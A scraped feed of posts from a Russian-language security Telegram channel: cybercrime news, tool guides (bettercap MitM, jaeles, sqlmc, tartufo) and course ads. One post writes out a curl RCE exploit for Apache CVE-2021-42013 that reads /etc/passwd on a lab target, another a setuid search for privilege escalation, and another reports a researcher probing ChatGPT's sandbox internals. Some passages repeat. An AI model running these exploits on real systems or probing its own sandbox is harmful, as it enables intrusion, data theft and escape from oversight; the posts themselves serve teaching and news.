В киберкриминальном мире появился новый фишинговый инструмент — GoIssue, нацеленный на пользователей GitHub и всю софтверную экосистему. 👀 GoIssue позволяет злоумышленникам собирать email-адреса с профилей GitHub и запускать массовые фишинговые атаки, что повышает риск кражи исходного кода и проникновения в корпоративные сети.
Повышенный риск для GitHub и организаций🛡
🔸 По данным SlashNext, GoIssue представляет собой серьёзную угрозу для разработчиков, использующих GitHub. Захватив учетные данные одного разработчика, злоумышленники могут развернуть атаки на цепочки поставок, создавая уязвимости для всей компании.
🔸 Фишинговые кампании, запущенные через GoIssue, могут привести к краже учетных данных, загрузке вредоносного ПО или несанкционированному доступу к приватным репозиториям.
Как работает GoIssue?⚙️
Инструмент автоматизирует сбор email-адресов с GitHub, используя токены и фильтры по критериям — например, членству в организациях и активности. Затем отправляются фишинговые сообщения, имитирующие уведомления GitHub, которые могут обходить спам-фильтры и попасть прямо в почтовый ящик разработчиков.
Стоимость и доступность GoIssue
GoIssue продается за $700 за индивидуальную версию или $3,000 за полный исходный код, предоставляя анонимность через прокси-сети и позволяя запускать высокотаргетированные фишинговые кампании.
Мнение экспертов:
#новости
Повышенный риск для GitHub и организаций
Как работает GoIssue?
Инструмент автоматизирует сбор email-адресов с GitHub, используя токены и фильтры по критериям — например, членству в организациях и активности. Затем отправляются фишинговые сообщения, имитирующие уведомления GitHub, которые могут обходить спам-фильтры и попасть прямо в почтовый ящик разработчиков.
Стоимость и доступность GoIssue
GoIssue продается за $700 за индивидуальную версию или $3,000 за полный исходный код, предоставляя анонимность через прокси-сети и позволяя запускать высокотаргетированные фишинговые кампании.
Мнение экспертов:
🗣️ «Появление GoIssue сигнализирует о новой эре, когда платформы для разработчиков становятся полем боя, и защита должна адаптироваться», — прокомментировал Джейсон Сороко из Sectigo.
🗣️ «Не менее важно дать пользователям навыки распознавать подозрительные письма и сообщать о них, а также интегрировать человеческую разведку в центр системы безопасности», — добавил Мика Аалто, сооснователь Hoxhunt.
#новости
Please open Telegram to view this post
VIEW IN TELEGRAM
👍14❤4🔥4
This media is not supported in your browser
VIEW IN TELEGRAM
Англоязычный криптовалютный стример случайно раскрыл свою seed-фразу во время прямой трансляции, что привело к мгновенной утрате $100,000 (около 10 млн рублей).
Ошибка произошла из-за того, что на экране оказалось открыто приложение с заметками, где была сохранена резервная фраза. Злоумышленники тут же воспользовались этой информацией и вывели все средства.
🗣️ Это не первый подобный случай. В июле стример Дмитрий Dmitry_Lixxx Лиханов также случайно показал свою seed-фразу в эфире. Хоть часть средств и удалось вернуть, история обошлась ему в немалую сумму.
#новости
Please open Telegram to view this post
VIEW IN TELEGRAM
👍17🤯8😁6❤4😢3🔥1
В 2016 году Илья Лихтенштейн, 35-летний предприниматель российского происхождения, взломал одну из крупнейших криптобирж мира — Bitfinex. Он похитил 120 000 биткоинов, стоимость которых с $70 млн на момент кражи выросла до $10,7 млрд.
✏️ Приговор и сотрудничество с властями
На этой неделе федеральный суд США приговорил Лихтенштейна к 5 годам лишения свободы. Его жена, Хизер Морган, также обвиняется в участии в отмывании украденных средств. Она была вовлечена в процесс без подробных объяснений со стороны Лихтенштейна, а узнала о взломе лишь в 2019 году.
✏️ Лихтенштейн полностью признал свою вину и помог правоохранительным органам вернуть 96% украденных биткоинов, а также предоставил ценную информацию для расследований других киберпреступлений.
Громкая кража и уникальная схема
🔸 Украдено: 120 000 BTC
🔸 Отмыто: ~21% от суммы (около $14 млн)
🔸 Средства перемещались с использованием курьеров из Казахстана и Украины.
👀 Интересный факт: Хизер Морган, известная под псевдонимом Razzlekhan, — бизнесвумен и рэперша. Её приговор будет вынесен 18 ноября, и прокуратура запрашивает для неё 18 месяцев тюрьмы.
#новости
На этой неделе федеральный суд США приговорил Лихтенштейна к 5 годам лишения свободы. Его жена, Хизер Морган, также обвиняется в участии в отмывании украденных средств. Она была вовлечена в процесс без подробных объяснений со стороны Лихтенштейна, а узнала о взломе лишь в 2019 году.
Громкая кража и уникальная схема
🗣️ Сотрудники IRS назвали использованную Лихтенштейном схему отмывания одной из самых сложных, с которыми они сталкивались.
#новости
Please open Telegram to view this post
VIEW IN TELEGRAM
🤔16🔥7❤4👍4👎1😁1😈1
git clone https://github.com/k1nd0ne/VolWeb.git
openssl genrsa > ./privkey.pem
openssl req -new -x509 -key ./privkey.pem > ./fullchain.pem
cd VolWeb/docked
cp .env.aws.example .env
vim .env (or any text editor)
cd VolWeb/docker
docker-compose up
admin:password
user:password
Please open Telegram to view this post
VIEW IN TELEGRAM
👍18🔥14❤5
Исследователь Марко Фигероа поделился своими исследованиями о получении широкого доступа к песочнице ChatGPT.
Сама песочница представляет из себя изолированную среду, позволяющую пользователям безопасно взаимодействовать с ней и быть изолированными от других пользователей.
✏️ Используя команду list files /home/sandbox/.openai_internal/ исследователю удалось получить информацию о конфигурации и настройках песочницы.
🏆 Воодушевившись найденными результатами, он получил возможность загружать в папку /mnt/data собственные Python-скрипты и выполнять их!
❗️ При этом стоит отметить, что песочница не предоставляет доступ к определённым конфиденциальным папкам и файлам (/root, /etc/shadow и т.д.).
👀 Однако OpenAI в своей bug bounty программе считает, что даже если таким путем можно извлечь файлы конфигурации, это все равно не является основанием для получения вознаграждения.
✔️ Вероятно, решение OpenAI оставить некоторые действия в «песочнице» как выходящие за рамки отражает их уверенность в стратегии сдерживания пользователя за пределы контейнера.
Сама песочница представляет из себя изолированную среду, позволяющую пользователям безопасно взаимодействовать с ней и быть изолированными от других пользователей.
🏆 Воодушевившись найденными результатами, он получил возможность загружать в папку /mnt/data собственные Python-скрипты и выполнять их!
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥15👍8❤7😁1
Старт: 2 декабря. Успейте приобрести курс по старой цене до конца ноября!
Содержание курса:
Получите практические навыки как в рабочих задачах, так и в Bug Bounty.
Please open Telegram to view this post
VIEW IN TELEGRAM
👍12❤6🎉4🥰1👾1
Права доступа в Linux💻
В правах доступа для файлов и каталогов приминяется одинаковый принцип. В целях упрощения права доступа разделены на три категории:
Для установки прав доступа используется такой шаблон:
Для практики можно создать простой скрипт который выводит надпись "hello world".
и посмотреть его права командой
Для примера у нас будет такой вывод:
Мы видим что для пользователя есть права на чтение и запись, для участников нашей группы есть право только читать, и у всех остальных тоже доступ только к чтению.
Запустить его мы не сможем, так как у скрипта нет на это прав. Для этого давайте изменим его права специальной командой
Теперь не только мы, но и пользователи нашей группы смогут использовать, читать и редактировать файл. Остальные только читать.
Для простоты можно заменить числа на буквы
В правах доступа для файлов и каталогов приминяется одинаковый принцип. В целях упрощения права доступа разделены на три категории:
r - чтение: 4;
w - запись: 2;
x - исполнение: 1;
Для установки прав доступа используется такой шаблон:
[User:r/w/x] [Group:r/w/x] [All:r/w/x]
Для практики можно создать простой скрипт который выводит надпись "hello world".
#!/bin/bash
echo "Hello world!"
и посмотреть его права командой
ls -la | grep 'main.sh'
Для примера у нас будет такой вывод:
-rw-r--r--
Мы видим что для пользователя есть права на чтение и запись, для участников нашей группы есть право только читать, и у всех остальных тоже доступ только к чтению.
Запустить его мы не сможем, так как у скрипта нет на это прав. Для этого давайте изменим его права специальной командой
chmod
:chmod 774 main.sh
Почему 774? Ответ: Мы прибегли с следующей формуле User/Group/All:4+2+1, где 4 - чтение, 2 - запись, 1 - исполнение. 4+2+1=7
Теперь не только мы, но и пользователи нашей группы смогут использовать, читать и редактировать файл. Остальные только читать.
Для простоты можно заменить числа на буквы
chmod +x main.shтакже будет работать и позволит скрипту исполниться.
Please open Telegram to view this post
VIEW IN TELEGRAM
👍35❤9✍4👾1
NetScanner👴
Netscanner — это инструмент сканирования сети с такими функциями, как: Список интерфейсов оборудования, Переключение активного интерфейса для сканирования и дампа пакетов, Сканирование сетей WiFi, Уровень сигнала WiFi (с диаграммами), Pinging CIDR с именем хоста, oui и mac-адресом, Дамп пакетов (TCP, UDP, ICMP, ARP), Дамп пакетов, Запуск/пауза дампа пакетов.
Использование netscanner:
Запуск:
Netscanner — это инструмент сканирования сети с такими функциями, как: Список интерфейсов оборудования, Переключение активного интерфейса для сканирования и дампа пакетов, Сканирование сетей WiFi, Уровень сигнала WiFi (с диаграммами), Pinging CIDR с именем хоста, oui и mac-адресом, Дамп пакетов (TCP, UDP, ICMP, ARP), Дамп пакетов, Запуск/пауза дампа пакетов.
Использование netscanner:
-t, --tick-rate: Скорость тика, т.е. количество тиков в секунду (По умолчанию: 1)
-f, --frame-rate: Частота кадров, т.е. количество кадров в секунду (По умолчанию: 10)
-h, --help: Вывод помощи
-v, --version: Вывод версии программы
Запуск:
netscanner
Вы сможете увидеть сигнали WiFi в левом верхнем меню, в правом верхнем доступные интерфейсы, а снизу Пакеты, Порты, Трафик.
Please open Telegram to view this post
VIEW IN TELEGRAM
👍12❤10🔥5👾3
Компоненты AD Kerberos, Microsoft SQL Server и центр сертификации — как их взломать? 💬
Научим на курсе “Атака на Active Directory". Авторы: HackerRalf (Михаил Порываев) и BlackRabbit (Павел Никитин), 5-кратные победители the Standoff
Содержание курса:
🙂 Архитектура AD и ее базис
🙂 Харденинг в AD, добыча критичной информации, развитие по инфраструктуре
🙂 Как закрепиться внутри? Техники и эксплоиты
➡️ практическая лаборатория AD содержит более 30 виртуальных машин, позволяя участникам отточить свои навыки на практике в 100+ рабочих тасках
🌟 Сертификат / удостоверение о повышении квалификации
🌟 Старт: 16 декабря*
*Успейте приобрести курс по старой цене до конца ноября!
🚀 @Codeby_Academy
➡️ Узнать подробнее о курсе
➡️ Читайте отзывы от учеников предыдущих потоков здесь
Научим на курсе “Атака на Active Directory". Авторы: HackerRalf (Михаил Порываев) и BlackRabbit (Павел Никитин), 5-кратные победители the Standoff
Содержание курса:
*Успейте приобрести курс по старой цене до конца ноября!
Please open Telegram to view this post
VIEW IN TELEGRAM
👍17🔥12❤9
Forwarded from Codeby One — пентест глазами исполнителя
Дипфейк — это поддельное фото, видео или аудио, сгенерированное искусственным интеллектом для имитации внешности и голоса человека. При создании дипфейков нейросеть анализирует и копирует мимику, движения лица, интонацию и даже фон речи. 👀
В новой статье разбираем как работают дипфейки и как с ними бороться.
Основные инструменты создания дипфейков — это генеративно-состязательные сети (GAN), автоэнкодеры, рекуррентные сети (для аудио) и сложные алгоритмы трекинга движений лица.
Но в политике и преступной сфере дипфейки представляют угрозу, помогая манипулировать общественным мнением и обманывать людей. Преступники подделывают голоса и образы для вымогательства денег и распространения дезинформации.
Чем опасны дипфейки?
Дипфейки становятся мощным инструментом в руках мошенников, позволяя обманом получать доступ к деньгам и конфиденциальной информации. Среди опасностей:
🔸 Финансовое мошенничество
🔸 Обход систем безопасности
➡️ Читать полную версию статьи
В новой статье разбираем как работают дипфейки и как с ними бороться.
Основные инструменты создания дипфейков — это генеративно-состязательные сети (GAN), автоэнкодеры, рекуррентные сети (для аудио) и сложные алгоритмы трекинга движений лица.
🗣️ Сейчас дипфейки можно встретить как в развлекательной индустрии, так и в рекламе. Например, дипфейк с Брюсом Уиллисом использовался в рекламе «МегаФона», а в кинематографе они позволяют завершать съёмки с участием актёров, которые покинули проект, как это было с Полом Уокером в «Форсаже 7».
Но в политике и преступной сфере дипфейки представляют угрозу, помогая манипулировать общественным мнением и обманывать людей. Преступники подделывают голоса и образы для вымогательства денег и распространения дезинформации.
Чем опасны дипфейки?
Дипфейки становятся мощным инструментом в руках мошенников, позволяя обманом получать доступ к деньгам и конфиденциальной информации. Среди опасностей:
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥21👍7❤5👾2
Telegram продолжает набирать популярность среди злоумышленников, использующих его для распространения вредоносных программ, таких как Lumma Stealer.
Lumma Stealer способен украсть огромное количество личной информации: логины, пароли, данные банковских карт, истории браузеров и многое другое.
⚙️ Как работает атака?
Lumma Stealer распространяется через Telegram-каналы, которые предлагают "крякнутые" программы или архивы с якобы безвредным ПО. Один из таких каналов, VIP HitMaster Program, насчитывает более 42,000 подписчиков, а второй, MegaProgram +, имеет 8660 подписчиков. Интересно, что оба канала часто пересылают друг другу сообщения, что делает их влияние ещё более широким.
В одном из разобранных случаев, злоумышленники замаскировали вредоносный файл под популярную программу CCleaner 2024 — средство для очистки системы и оптимизации производительности. Но после извлечения из архива (.rar) пользователи обнаруживали, что вместо ожидаемого установочного файла CCleaner, они получали два заражённых файла, одним из которых был Lumma Stealer. В частности, файл с названием XTb9DOBjB3.exe является вредоносным и используется для кражи конфиденциальной информации.
⚙️ Механизмы скрытности и обфускации
Файл был не просто вредоносным, но и тщательно замаскированным. Например, он скрывал код, который подключался к аккаунту на Steam, чтобы установить связь с командным сервером злоумышленника. Странным образом, имя пользователя было зашифровано и подключено к нескольким псевдонимам.
После дешифровки этого имени, вредоносное ПО связывалось с сервером командования и управления (C2), что позволяло атакующим не только красть данные, но и скачивать дополнительные вредоносные файлы. Все эти действия затрудняют обнаружение вредоносного ПО антивирусами и системами защиты.
💱 География атак
Больше всего атак в настоящее время подвергаются пользователи Telegram из Индии, за ними следуют пользователи из США и Европы. Это подтверждает, что злоумышленники стремятся охватить как можно более широкую аудиторию, используя Telegram как популярную платформу для доставки угроз.
🚨 Запомните, использование популярных платформ как каналов для распространения вредоносного ПО — это не что-то новое, но Telegram даёт злоумышленникам уникальные возможности для обхода защиты. Поэтому будьте особенно внимательны к тем файлам, которые вы скачиваете и открываете через этот мессенджер.
#новости
Lumma Stealer способен украсть огромное количество личной информации: логины, пароли, данные банковских карт, истории браузеров и многое другое.
Lumma Stealer распространяется через Telegram-каналы, которые предлагают "крякнутые" программы или архивы с якобы безвредным ПО. Один из таких каналов, VIP HitMaster Program, насчитывает более 42,000 подписчиков, а второй, MegaProgram +, имеет 8660 подписчиков. Интересно, что оба канала часто пересылают друг другу сообщения, что делает их влияние ещё более широким.
В одном из разобранных случаев, злоумышленники замаскировали вредоносный файл под популярную программу CCleaner 2024 — средство для очистки системы и оптимизации производительности. Но после извлечения из архива (.rar) пользователи обнаруживали, что вместо ожидаемого установочного файла CCleaner, они получали два заражённых файла, одним из которых был Lumma Stealer. В частности, файл с названием XTb9DOBjB3.exe является вредоносным и используется для кражи конфиденциальной информации.
Файл был не просто вредоносным, но и тщательно замаскированным. Например, он скрывал код, который подключался к аккаунту на Steam, чтобы установить связь с командным сервером злоумышленника. Странным образом, имя пользователя было зашифровано и подключено к нескольким псевдонимам.
После дешифровки этого имени, вредоносное ПО связывалось с сервером командования и управления (C2), что позволяло атакующим не только красть данные, но и скачивать дополнительные вредоносные файлы. Все эти действия затрудняют обнаружение вредоносного ПО антивирусами и системами защиты.
Больше всего атак в настоящее время подвергаются пользователи Telegram из Индии, за ними следуют пользователи из США и Европы. Это подтверждает, что злоумышленники стремятся охватить как можно более широкую аудиторию, используя Telegram как популярную платформу для доставки угроз.
#новости
Please open Telegram to view this post
VIEW IN TELEGRAM
👍23❤6🔥3👾2
Мощная, легко расширяемая платформа, написанная на
Установка в
sudo apt update && sudo apt install bettercap
Установка via
docker pull bettercap/dev
docker run -it --privileged --net=host bettercap/dev -h
Запуск Web UI и интерактивной сессии:
sudo bettercap -caplet http-ui
sudo bettercap
Стандартные данные для входа:
Логин: user
Пароль: pass
Возможности:
Сканирование WiFi сетей, деаутентификация клиентов
Авто захват рукопожатий
Bluetooth сканирование
ARP, DNS, NDP and DHCPv6 спуферы для MitM атак
Мощный сетевой сниффер
Быстрый сканер портов
Удобный веб интерфейс
И многое другое
Please open Telegram to view this post
VIEW IN TELEGRAM
👍31❤9🔥5👾3👎1
🚩 Новые задания на платформе Codeby Games!
🕵️ Категория Форензика — В чём секрет кота Бориса?
🏆 Категория Квесты — SSL
🧰 Категория PWN — 0xLEET
Приятного хакинга!
🕵️ Категория Форензика — В чём секрет кота Бориса?
Приятного хакинга!
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥16👍13❤6👾3🎉2😁1
Мощный, гибкий и легко расширяемый framework, написанный на
Установка:
go install github.com/jaeles-project/jaeles@latest
Установка сигнатур:
jaeles config init
Примеры запуска:
# Scan Usage example:
jaeles scan -s <signature> -u <url>
jaeles scan -c 50 -s <signature> -U <list_urls> -L <level-of-signatures>
jaeles scan -c 50 -s <signature> -U <list_urls>
jaeles scan -c 50 -s <signature> -U <list_urls> -p 'dest=xxx.burpcollaborator.net'
jaeles scan -c 50 -s <signature> -U <list_urls> -f 'noti_slack "{{.vulnInfo}}"'
jaeles scan -v -c 50 -s <signature> -U list_target.txt -o /tmp/output
jaeles scan -s <signature> -s <another-selector> -u http://example.com
jaeles scan -G -s <signature> -s <another-selector> -x <exclude-selector> -u http://example.com
cat list_target.txt | jaeles scan -c 100 -s <signature>
# Examples:
jaeles scan -s 'jira' -s 'ruby' -u target.com
jaeles scan -c 50 -s 'java' -x 'tomcat' -U list_of_urls.txt
jaeles scan -G -c 50 -s '/tmp/custom-signature/.*' -U list_of_urls.txt
jaeles scan -v -s '~/my-signatures/products/wordpress/.*' -u 'https://wp.example.com' -p 'root=[[.URL]]'
cat urls.txt | grep 'interesting' | jaeles scan -L 5 -c 50 -s 'fuzz/.*' -U list_of_urls.txt --proxy http://127.0.0.1:8080
jaeles server -s '/tmp/custom-signature/sensitive/.*' -L 2 --fi
Написал шаблон под RCE для веб сервера Apache 2.4.49-50
Задание на codeby.games с уязвимым сервером. На нем и проверим.
Запрос curl'ом выглядит так:
curl 'http://62.173.140.174:10009/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh' --data 'echo Content-Type: text/plain; echo; id && cat /etc/passwd'
Запуск:
./jaeles scan -s '~/.jaeles/base-signatures/cves/apache-rce-cve-2021-42013*' -u 'http://62.173.140.174:10009' -v
Кладем в директорию сигнатур и инициализируем конфиг:
./jaeles config init
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
👍20❤13👎10🔥4✍2👾2🤯1😡1
SQLMC 💉
SQLMC (SQL Injection Massive Checker) — это инструмент, предназначенный для сканирования домена на предмет уязвимостей SQL-инъекций. Он сканирует указанный URL-адрес до указанной глубины, проверяет каждую ссылку на наличие уязвимостей SQL-инъекций и сообщает о своих результатах.
Использование sqlmc:
Например:
SQLMC (SQL Injection Massive Checker) — это инструмент, предназначенный для сканирования домена на предмет уязвимостей SQL-инъекций. Он сканирует указанный URL-адрес до указанной глубины, проверяет каждую ссылку на наличие уязвимостей SQL-инъекций и сообщает о своих результатах.
Использование sqlmc:
-u, --url: Сканирует URL
-d, --depth: Глубина сканирования
-o, --output: Сохранить файл с выводом
Например:
sqlmc -u http://example.com -d 2
👍48❤13🔥12👎1👾1
Установка:
pip install tartufo
Есть несколько режимов:
tartufo scan-folder [OPTIONS] TARGET
tartufo scan-local-repo [OPTIONS] REPO_PATH
tartufo scan-remote-repo [OPTIONS] GIT_URL
В основном интересен scan-remote-repo, проверил на своем репозитории, забыл убрать токен телеграм бота, на скрине все видно
tartufo scan-remote-repo https://github.com/akhomlyuk/pyradm
Токены заменены!
Please open Telegram to view this post
VIEW IN TELEGRAM
👍39❤16🔥15😁2
Поиск файлов в Linux🔍
Существует несколько способов поиска файлов в Linux. Три основых - это команды
Команда
Для начала нужно её обновить:
Теперь можем использовать команду
Если результатов слишком много, используйте ключКомбинируйте это с командой grep о которой я рассказал тут и тогда вы получите больше примуществ.
Чтобы найти путь к файлу, введите команду
Преимущество команды
Или, если вы хотите найти большие файлы, то можно воспользоваться ключом
Можно также найти файлы setuid в Linux для повышения привелегий.
Существует несколько способов поиска файлов в Linux. Три основых - это команды
locate
, find
и which
.Команда
locate
хранит свои данные в базе данных, потому при поиске работает быстрее.Для начала нужно её обновить:
updatedb
Теперь можем использовать команду
locate
:locate [ИМЯ ФАЙЛА]
Если результатов слишком много, используйте ключ
-n
для того, чтобы ограничить вывод. Чтобы найти путь к файлу, введите команду
which
. Она использует переменную среды $PATH
для поиска результатов. Например, чтобы узнать где установлена та или иная программа, введите:which [ИМЯ ПРОГРАММЫ]
Преимущество команды
find
является её возможность добавлять более детальные фильтры, что найти что-то. Например, чтобы найти файл в корневом каталоге, можно использовать:find /home/user/ -name "file.txt"
Или, если вы хотите найти большие файлы, то можно воспользоваться ключом
-size
:find / -size +1G 2> /dev/null
2> /dev/null очистит вывод и отфильтрует ошибки
Можно также найти файлы setuid в Linux для повышения привелегий.
find / -perm -u=s -type f 2>/dev/null
✍44🔥18❤13👍3